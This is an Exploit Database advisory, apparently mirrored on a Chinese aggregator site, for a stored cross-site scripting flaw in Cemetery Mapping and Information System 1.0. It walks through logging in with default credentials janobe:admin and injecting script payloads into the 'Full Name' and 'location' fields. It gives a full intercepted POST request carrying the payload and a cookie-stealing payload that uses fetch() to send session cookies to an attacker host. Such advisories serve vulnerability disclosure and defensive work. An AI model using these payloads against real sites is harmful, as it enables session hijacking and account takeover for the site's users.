Cemetry Mapping and Information System 1.0 – Multiple Stored Cross-Site Scripting

• Exploit Database
• 14 阅读

• 作者： Mesut Cetin
  日期： 2021-01-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49405/

• # Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting
  # Exploit Author: Mesut Cetin
  # Date: 2021-01-10
  # Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
  # Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
  # Affected Version: 1.0
  # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34 
  
  Affected parameter: "full name", "location"
  
  Proof of concept:
  
  1. Login under admin panel, http://localhost/CemeteryMapping/admin/login.php, with default credentials janobe:admin
  2. Click on "Deceased Persons"
  3. Choose one of the users and click on their names to edit it
  4. In the field "Full Name" insert the payload: <script>alert(document.cookie)</script>
  5. Save and open the webpage under http://localhost/CemeteryMapping/index.php?q=person
  6. You will receive the PHPSESSID cookie as alert. The cookie values can be redirected to attacker page by using payloads like <script src="data:application/javascript,fetch(`https://attacker-page.com/${document.cookie}`)"></script>
  
  To manipulate the "location" parameter, we will use Burp Suite. Capture the request with Burp:
  
  POST /CemeteryMapping/admin/person/controller.php?action=edit HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 149
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/CemeteryMapping/admin/person/index.php?view=edit&id=1
  Cookie: PHPSESSID=h9smkdr8dvjhsjviugnvot261m
  Upgrade-Insecure-Requests: 1
  
  PEOPLEID=1&GRAVENO=1&FNAME=JACONDIA+A.MORTEL&CATEGORIES=C&BORNDATE=07%2F04%2F1992&DIEDDATE=12%2F29%2F2003&LOCATION=BUENAVISTA+LOOC+CEMETERY<script>alert(document.cookie)</script>&save=
  
  And forward the request. The cookie values will be displayed on screen.